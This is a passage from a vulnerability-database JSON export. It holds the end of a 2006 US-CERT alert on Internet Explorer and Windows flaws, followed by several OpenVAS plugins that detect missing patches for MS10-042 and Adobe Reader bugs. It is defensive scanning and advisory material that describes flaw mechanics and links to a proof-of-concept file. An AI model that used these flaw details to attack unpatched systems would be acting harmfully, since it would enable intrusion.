IE.\r\n (CVE-2006-1186)\r\n\r\n\r\n VU#824324 - Microsoft Internet Explorer fails to properly handle HTML\r\n elements with a specially crafted tag \r\n\r\n Microsoft Internet Explorer fails to properly handle HTML element\r\n tags, which may allow a remote, unauthenticated attacker to execute\r\n arbitrary code.\r\n (CVE-2006-1188)\r\n\r\n\r\n VU#341028 - Microsoft Internet Explorer fails to properly handle\r\n double-byte characters in specially crafted URLs \r\n\r\n Microsoft Internet Explorer fails to properly handle double-byte\r\n characters in URLs, which may allow a remote, unauthenticated attacker\r\n to execute arbitrary code.\r\n (CVE-2006-1189)\r\n\r\n\r\n VU#234812 - Microsoft Windows contains a vulnerability in the\r\n RDS.Dataspace ActiveX control in MDAC \r\n\r\n Microsoft Windows fails to properly handle the RDS.Dataspace ActiveX\r\n control possibly allowing a remote attacker to execute arbitrary code.\r\n (CVE-2006-0003)\r\n\r\n\r\n VU#641460 - Microsoft Windows Explorer fails to properly handle COM\r\n objects \r\n\r\n Microsoft Windows fails to properly handle COM Objects. This\r\n vulnerability may allow a remote unauthenticated attacker to execute\r\n arbitrary code on a vulnerable system.\r\n (CVE-2006-0012)\r\n\r\n\r\nII. Impact\r\n\r\n A remote, unauthenticated attacker could execute arbitrary code with\r\n the privileges of the user. If the user is logged on with\r\n administrative privileges, the attacker could take complete control of\r\n an affected system. An attacker may also be able to cause a denial of\r\n service.\r\n\r\n\r\nIII. Solution\r\n\r\nApply Updates\r\n\r\n Microsoft has provided updates for these vulnerabilities in the\r\n Security Bulletins and on the Microsoft Update site.\r\n\r\nWorkarounds\r\n\r\n Please see the US-CERT Vulnerability Notes for workarounds. Many of\r\n these vulnerabilities can be mitigated by following the instructions\r\n listed in the Securing Your Web Browser document.\r\n\r\nAppendix A. References\r\n\r\n * Microsoft Security Bulletin Summary for April 2006 -\r\n <http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx>\r\n\r\n * US-CERT Vulnerability Note VU#876678 -\r\n <http://www.kb.cert.org/vuls/id/876678>\r\n\r\n * US-CERT Vulnerability Note VU#984473 -\r\n <http://www.kb.cert.org/vuls/id/984473>\r\n\r\n * US-CERT Vulnerability Note VU#434641 -\r\n <http://www.kb.cert.org/vuls/id/434641>\r\n\r\n * US-CERT Vulnerability Note VU#503124 -\r\n <http://www.kb.cert.org/vuls/id/503124>\r\n\r\n * US-CERT Vulnerability Note VU#959049 -\r\n <http://www.kb.cert.org/vuls/id/959049>\r\n\r\n * US-CERT Vulnerability Note VU#824324 -\r\n <http://www.kb.cert.org/vuls/id/824324>\r\n\r\n * US-CERT Vulnerability Note VU#341028 -\r\n <http://www.kb.cert.org/vuls/id/341028>\r\n\r\n * US-CERT Vulnerability Note VU#234812 -\r\n <http://www.kb.cert.org/vuls/id/234812>\r\n\r\n * US-CERT Vulnerability Note VU#641460 -\r\n <http://www.kb.cert.org/vuls/id/641460>\r\n\r\n * CVE-2006-1359 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1359>\r\n\r\n * CVE-2006-1245 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1245>\r\n\r\n * CVE-2006-1388 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1388>\r\n\r\n * CVE-2006-1185 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1185>\r\n\r\n * CVE-2006-1186 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1186>\r\n\r\n * CVE-2006-1188 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1188>\r\n\r\n * CVE-2006-1189 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1189>\r\n\r\n * CVE-2006-0003 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003>\r\n\r\n * CVE-2006-0012 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0012>\r\n\r\n * Microsoft Update - <https://update.microsoft.com/microsoftupdate>\r\n\r\n * Securing Your Web Browser -\r\n <http://www.us-cert.gov/reading_room/securing_browser/#Internet_Ex\r\n plorer>\r\n\r\n\r\n ____________________________________________________________________\r\n\r\n The most recent version of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA06-101A.html>\r\n ____________________________________________________________________\r\n\r\n Feedback can be directed to US-CERT Technical Staff. Please send\r\n email to <cert@cert.org> with "TA06-101A Feedback VU#876678" in the\r\n subject.\r\n ____________________________________________________________________\r\n\r\n For instructions on subscribing to or unsubscribing from this\r\n mailing list, visit <http://www.us-cert.gov/cas/signup.html>.\r\n ____________________________________________________________________\r\n\r\n Produced 2006 by US-CERT, a government organization.\r\n\r\n Terms of use:\r\n\r\n <http://www.us-cert.gov/legal.html>\r\n ____________________________________________________________________\r\n\r\n\r\nRevision History\r\n\r\n Apr 11, 2006: Initial release\r\n\r\n\r\n\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.1 (GNU/Linux)\r\n\r\niQEVAwUBRDwj9n0pj593lg50AQInJggAoOBNa20SU8JukBoK5elr5vWOLcAjycHt\r\nCg0+064ncCpQXoWiYPrLGVzg4/MCTVUygbYl85cePp5cHSHqpfuYXoBuZwSKu36+\r\nolQdkbU1ejViA8A0XPsQ3EgtIRlDZSgL1ncYlRM8QxK8CF7QV616ta8q6H/3EDMM\r\ni+tXy6gzQMqJeUthopzGcfpf6U5Qu9PCk/+Pj66GfFhHpARanLef2H28WFRazC+I\r\nR+vLGLFLV0gp1Iy7t267l1BhN1w1z+fXD0WwYkiTwb0mzeize8Amdqlb5c4Vn4wh\r\nHAF/XGiCe5qkMhM7kRLA70JsNfSkI38JPHWSo9/a04wFBKENCAwNpA==\r\n=w6IC\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2006-04-12T00:00:00", "published": "2006-04-12T00:00:00", "id": "SECURITYVULNS:DOC:12171", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12171", "title": "US-CERT Technical Cyber Security Alert TA06-101A -- Microsoft Windows and Internet Explorer Vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-04-27T19:23:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1885"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-042.", "modified": "2020-04-23T00:00:00", "published": "2010-07-14T00:00:00", "id": "OPENVAS:1361412562310902080", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902080", "type": "openvas", "title": "Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902080\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-07-14 10:07:03 +0200 (Wed, 14 Jul 2010)\");\n script_bugtraq_id(40725);\n script_cve_id(\"CVE-2010-1885\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593)\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/59267\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1417\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-042\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to inject malicious code\n in the Help and Support Center and execute arbitrary commands on a vulnerable\n system by tricking a user into visiting a specially crafted web page.\");\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows 2003 Service Pack 2 and prior\");\n script_tag(name:\"insight\", value:\"The flaw is due to the error in 'MPC::HTML::UrlUnescapeW()' function\n within the Help and Support Center application (helpctr.exe) that does not\n properly check the return code of 'MPC::HexToNum()' when escaping URLs.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS10-042.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3) <= 0){\n exit(0);\n}\n\nif(hotfix_missing(name:\"2229593\") == 0){\n exit(0);\n}\n\nsysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\COM3\\Setup\",\n item:\"Install Path\");\nif(!sysPath){\n exit(0);\n}\n\nsysPath = sysPath - \"\\system32\" + \"\\pchealth\\helpctr\\binaries\\helpsvc.exe\";\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:sysPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:sysPath);\n\nsysVer = GetVer(file:file, share:share);\nif(!sysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.3720\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"5.1.2600.3720\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n else if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.5997\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"5.1.2600.5997\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.4726\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"5.2.3790.4726\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1885"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-042.", "modified": "2017-02-20T00:00:00", "published": "2010-07-14T00:00:00", "id": "OPENVAS:902080", "href": "http://plugins.openvas.org/nasl.php?oid=902080", "type": "openvas", "title": "Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms10-042.nasl 5361 2017-02-20 11:57:13Z cfi $\n#\n# Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to inject malicious code\n in the Help and Support Center and execute arbitrary commands on a vulnerable\n system by tricking a user into visiting a specially crafted web page.\n Impact Level: System\";\ntag_affected = \"Microsoft Windows XP Service Pack 3 and prior.\n Microsoft Windows 2003 Service Pack 2 and prior.\";\ntag_insight = \"The flaw is due to the error in 'MPC::HTML::UrlUnescapeW()' function\n within the Help and Support Center application (helpctr.exe) that does not\n properly check the return code of 'MPC::HexToNum()' when escaping URLs.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/Bulletin/MS10-042.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS10-042.\";\n\nif(description)\n{\n script_id(902080);\n script_version(\"$Revision: 5361 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:57:13 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-14 10:07:03 +0200 (Wed, 14 Jul 2010)\");\n script_bugtraq_id(40725);\n script_cve_id(\"CVE-2010-1885\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593)\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/59267\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1417\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/Bulletin/MS10-042.mspx\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3) <= 0){\n exit(0);\n}\n\n# Check for MS10-042 Hotfix\nif(hotfix_missing(name:\"2229593\") == 0){\n exit(0);\n}\n\nsysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\COM3\\Setup\",\n item:\"Install Path\");\nif(!sysPath){\n exit(0);\n}\n\nsysPath = sysPath - \"\\system32\" + \"\\pchealth\\helpctr\\binaries\\helpsvc.exe\";\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:sysPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:sysPath);\n\nsysVer = GetVer(file:file, share:share);\nif(!sysVer){\n exit(0);\n}\n\n# Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for helpsvc.exe version < 5.1.2600.3720\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.3720\")){\n security_message(0);\n }\n exit(0);\n }\n else if(\"Service Pack 3\" >< SP)\n {\n # Grep for helpsvc.exe version < 5.1.2600.5997\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.5997\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for helpsvc.exe version < 5.2.3790.4726\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.4726\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-20T08:49:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2265", "CVE-2010-1885"], "description": "This host is prone to remote code execution vulnerability.", "modified": "2017-07-05T00:00:00", "published": "2010-06-11T00:00:00", "id": "OPENVAS:801358", "href": "http://plugins.openvas.org/nasl.php?oid=801358", "type": "openvas", "title": "MS Windows Help and Support Center Remote Code Execution Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_windows_help_n_support_center_code_exec_vuln.nasl 6529 2017-07-05 06:05:51Z cfischer $\n#\n# MS Windows Help and Support Center Remote Code Execution Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Updated By: Antu Sanadi <santu@secpod.com> on 2010-06-16\n# Updated CVSS score, Description, References and added the CVE-2010-2265\n#\n# Updated By: Antu Sanadi <santu@secpod.com> on 2011-05-18\n# -This plugin is invalidated by secpod_ms10-042.nasl \n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n\ntag_solution = \"Vendor has released a patch for the issue, refer below link for\npatch. http://www.microsoft.com/technet/security/bulletin/ms10-042.mspx \";\n\ntag_impact = \"Successful exploitation will allow remote attackers to execute\narbitrary code or compromise a vulnerable system.\n\nImpact Level: System\";\n\ntag_affected = \"Windows XP Service Pack 2/3 Windows Server 2003 Service Pack 2.\";\n\ntag_insight = \"The flaws are due to:\n- An error in the 'MPC::HTML::UrlUnescapeW()' function within the Help and\nSupport Center application (helpctr.exe) that does not properly check the\nreturn code of 'MPC::HexToNum()' when escaping URLs, which could allow\nattackers to bypass whitelist restrictions and invoke arbitrary help files.\n- An input validation error in the 'GetServerName()' function in the\n'C:\\WINDOWS\\PCHealth\\HelpCtr\\System\\sysinfo\\commonFunc.js' script invoked via\n'ShowServerName()' in 'C:\\WINDOWS\\PCHealth\\HelpCtr\\System\\sysinfo\\sysinfomain.htm',\nwhich could be exploited by attackers to execute arbitrary scripting code.\";\n\ntag_summary = \"This host is prone to remote code execution vulnerability.\";\n\nif(description)\n{\n script_id(801358);\n script_version(\"$Revision: 6529 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-05 08:05:51 +0200 (Wed, 05 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-11 14:27:58 +0200 (Fri, 11 Jun 2010)\");\n script_cve_id(\"CVE-2010-1885\", \"CVE-2010-2265\"); \n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"MS Windows Help and Support Center Remote Code Execution Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/59267\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1417\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/advisory/2219475.mspx\");\n \n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\n## This plugin is invalidated by secpod_ms10-042.nasl \nexit(66);\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4, win2003:3) <= 0){\n exit(0);\n}\n\nif(registry_key_exists(key:\"SOFTWARE\\Classes\\HCP\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-11T15:23:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2265", "CVE-2010-1885"], "description": "This host is prone to remote code execution vulnerability.\n\n This VT has been replaced by ", "modified": "2020-06-10T00:00:00", "published": "2010-06-11T00:00:00", "id": "OPENVAS:1361412562310801358", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801358", "type": "openvas", "title": "MS Windows Help and Support Center Remote Code Execution Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MS Windows Help and Support Center Remote Code Execution Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Updated By: Antu Sanadi <santu@secpod.com> on 2010-06-16\n# Updated CVSS score, Description, References and added the CVE-2010-2265\n#\n# Updated By: Antu Sanadi <santu@secpod.com> on 2011-05-18\n# -This plugin is invalidated by secpod_ms10-042.nasl\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801358\");\n script_version(\"2020-06-10T11:35:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-10 11:35:03 +0000 (Wed, 10 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-06-11 14:27:58 +0200 (Fri, 11 Jun 2010)\");\n script_cve_id(\"CVE-2010-1885\", \"CVE-2010-2265\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"MS Windows Help and Support Center Remote Code Execution Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/59267\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1417\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2010/2219475\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-042\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute\n arbitrary code or compromise a vulnerable system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP Service Pack 2/3\n\n - Microsoft Windows Server 2003 Service Pack 2\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to:\n\n - An error in the 'MPC::HTML::UrlUnescapeW()' function within the Help and\n Support Center application (helpctr.exe) that does not properly check the\n return code of 'MPC::HexToNum()' when escaping URLs, which could allow\n attackers to bypass whitelist restrictions and invoke arbitrary help files.\n\n - An input validation error in the 'GetServerName()' function in the\n 'C:\\WINDOWS\\PCHealth\\HelpCtr\\System\\sysinfo\\commonFunc.js' script invoked via\n 'ShowServerName()' in 'C:\\WINDOWS\\PCHealth\\HelpCtr\\System\\sysinfo\\sysinfomain.htm',\n which could be exploited by attackers to execute arbitrary scripting code.\");\n\n script_tag(name:\"summary\", value:\"This host is prone to remote code execution vulnerability.\n\n This VT has been replaced by 'Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593)' (OID: 1.3.6.1.4.1.25623.1.0.902080)\");\n\n script_tag(name:\"solution\", value:\"Vendor has released a patch for the issue. Please see the references\n for more information.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66); # This plugin is invalidated by secpod_ms10-042.nasl\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:40:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0658", "CVE-2009-0927"], "description": "This host has Adobe Reader installed, and is prone to buffer overflow\nvulnerability.", "modified": "2019-04-29T00:00:00", "published": "2009-03-03T00:00:00", "id": "OPENVAS:1361412562310900321", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900321", "type": "openvas", "title": "Buffer Overflow Vulnerability in Adobe Reader (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Buffer Overflow Vulnerability in Adobe Reader (Linux)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900321\");\n script_version(\"2019-04-29T15:08:03+0000\");\n script_cve_id(\"CVE-2009-0658\", \"CVE-2009-0927\");\n script_bugtraq_id(33751, 34169, 34229);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-04-29 15:08:03 +0000 (Mon, 29 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-03-03 06:56:37 +0100 (Tue, 03 Mar 2009)\");\n script_name(\"Buffer Overflow Vulnerability in Adobe Reader (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host has Adobe Reader installed, and is prone to buffer overflow\nvulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This issue is due to error in array indexing while processing JBIG2 streams\nand unspecified vulnerability related to a JavaScript method.\");\n script_tag(name:\"impact\", value:\"This can be exploited to corrupt arbitrary memory via a specially crafted PDF\nfile, related to a non-JavaScript function call and to execute arbitrary code\nin context of the affected application.\");\n script_tag(name:\"affected\", value:\"Adobe Reader version 9.x < 9.1, 8.x < 8.1.4, 7.x < 7.1.1 on Linux\");\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader version 9.1 or 8.1.4 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/33901\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-03.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-04.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa09-01.html\");\n script_xref(name:\"URL\", value:\"http://downloads.securityfocus.com/vulnerabilities/exploits/33751-PoC.pl\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/downloads/product.jsp?product=10&platform=Unix\");\n 